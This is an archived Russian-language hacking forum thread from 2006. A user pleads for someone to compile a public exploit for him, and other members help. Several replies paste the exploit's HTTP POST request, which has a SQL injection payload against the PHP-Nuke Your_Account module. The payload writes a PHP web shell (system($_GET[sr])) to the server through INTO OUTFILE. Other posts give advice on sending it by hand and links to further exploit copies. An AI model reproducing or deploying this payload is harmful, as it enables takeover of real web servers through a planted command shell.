PDA

Просмотр полной версии : Срочно! Сплоит!

LoFFi
11.05.2006, 19:55
Люди, под страхом расстрела позарез нужен сплоит!
Вот он

http://securityreason.com/achievement_exploitalert/7

Он на C++ и защищен или хз что, а я в C++ не шарю!
Нужен срочно, так что модеры извените за тему оффтоп! убейте ее потом!
задача: скомпилить под винду или линукс этот сплоит
и дать его мне =)

Репой озолочу!!!
max_pain89
11.05.2006, 20:02
fprintf(go,"POST %s HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Referer: http://%s%s?name=Your_Account&op=new user\n"
"User-Agent: SecurityReason - [SR]\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"name=Your_Account&op=new
user&user_email=securitybreak@securityreason.com&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason
Shell\";system($_GET[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n&quo
t;
"Cookie: lang=english\r\n\r\n",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
printf("[+] Sending exploit [OK]\n\n");


Тут вроде все понятно написано. На Ачате можешь отправить с помощью InetCrack
SanyaX
11.05.2006, 20:02
Под linux компилируй на винде он не попрёт.
SanyaX
11.05.2006, 20:04
А проще не парьсе сделай в ручную всё. Вот тебе кусок кода подправьне много и отправь методом пост.

"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Referer: http://%s%s?name=Your_Account&op=new user\n"
"User-Agent: SecurityReason - [SR]\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"name=Your_Account&op=new
user&user_email=securitybreak@securityreason.com&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason
Shell\";system($_GET[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n&quo
t;
"Cookie: lang=english\r\n\r\n"
Go0o$E
11.05.2006, 20:50
http://milw0rm.com/exploits/1270
Тоже самое вроде? Только на php.
LoFFi
11.05.2006, 21:45
Короче я сам вспомнил C++ и исправил =) никто репу не заслужил... закрывайте тему
3er0
11.05.2006, 21:46
лол) я не успел) может кто потестит мой?
__http://m3x000.narod.ru/lcc.rar
если не работает сильно не бить) и хотелось бы на твой вариант посмотреть LoFFi. Может научюсь чему-нибудь хорошему